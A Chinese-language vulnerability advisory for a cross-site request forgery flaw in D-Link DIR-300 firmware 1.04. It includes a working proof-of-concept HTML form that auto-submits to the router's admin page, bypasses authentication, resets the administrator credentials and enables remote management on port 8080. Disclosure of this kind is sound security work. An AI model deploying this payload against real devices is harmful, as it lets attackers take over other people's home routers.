发布日期：2010-12-17
更新日期：2010-12-21

受影响系统：

D-Link DIR-300 1.04

描述：

---

BUGTRAQ  ID: 45473

D-Link DIR-300是无线G宽带路由器。

D-Link DIR-300在实现上存在跨站脚本伪造漏洞，攻击者可能利用此漏洞在受影响的设备上运行授权命令，更改配置，造成拒绝服务或注入任意脚本代码。

<*来源：outlaw.dll
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<form name="exploit" action="http://server/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0"  method="post">
        <input type="hidden" name="ACTION_POST" value="1" />
        <input type="hidden" name="admin_name" value="outlaw.dll" />
        <input type="hidden" name="admin_password1" value="1337" />
        <input type="hidden" name="admin_password2" value="1337" />
        <input type="hidden" name="rt_enable_h" value="1" />
        <input type="hidden" name="rt_port" value="8080" />
        <input type="hidden" name="rt_ipaddr" value="192.168.0.1337" />
</form>
<script>document.exploit.submit();</script>

建议：

---

厂商补丁：

D-Link
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.dlink.com/

浏览次数：3762
严重程度：0（网友投票）